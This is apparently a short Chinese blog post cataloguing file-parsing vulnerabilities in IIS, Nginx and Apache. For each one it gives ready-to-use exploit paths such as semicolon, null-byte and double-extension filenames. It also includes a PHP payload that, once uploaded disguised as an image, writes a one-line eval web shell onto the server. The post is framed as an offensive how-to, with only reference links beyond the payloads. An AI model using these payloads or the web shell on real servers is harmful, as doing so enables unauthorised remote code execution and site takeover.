解析漏洞

摘要

解析漏洞大全

0x01 IIS 5.x/6.0解析漏洞

利用方法有两种:
1.目录解析
/xx.asp/xx.jpg 
2.文件解析
/xx.asp;.jpg
IIS6.0不会把上面的文件当做jpg格式文件处理,而是当成了asp文件
wooyun上的IIS 6.0解析漏洞利用案例:
http://www.wooyun.org/searchbug.php?q=IIS6.0


0x02 IIS7.0/IIS7.5/Nginx<8.03 解析漏洞

这个漏洞是80sec研究出来的,见
1.http://www.80sec.com/nginx-securit.html
2.http://www.laruence.com/2010/05/20/1495.html


在默认Fast-CGI开启状况下,上传一个名字为xx.jpg,内容为
[php] view plaincopy在CODE上查看代码片派生到我的代码片
<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>  

的文件,然后访问xx.jpg/.php,在这个目录下就会生成一句话木马 shell.php


0x03 Nginx < 8.03空字节代码执行漏洞

Ngnix在图片中其纳入PHP代码然后通过访问:
xx.jpg%00.php
来执行其中的代码


Nginx 空字节代执行漏洞案例:
http://www.wooyun.org/searchbug.php?q=%2500.php


0x04 Apache解析漏洞

Apache 是从右到左开始判断解析,如果为不可识别解析,就再往左判断.


比如 xx.php.owf.rar “.owf”和”.rar” 这两种后缀是apache不可识别解析,apache就会把xx.php.owf.rar解析成xx.php


0x05 参考

http://drops.wooyun.org/papers/539


目前评论:0 条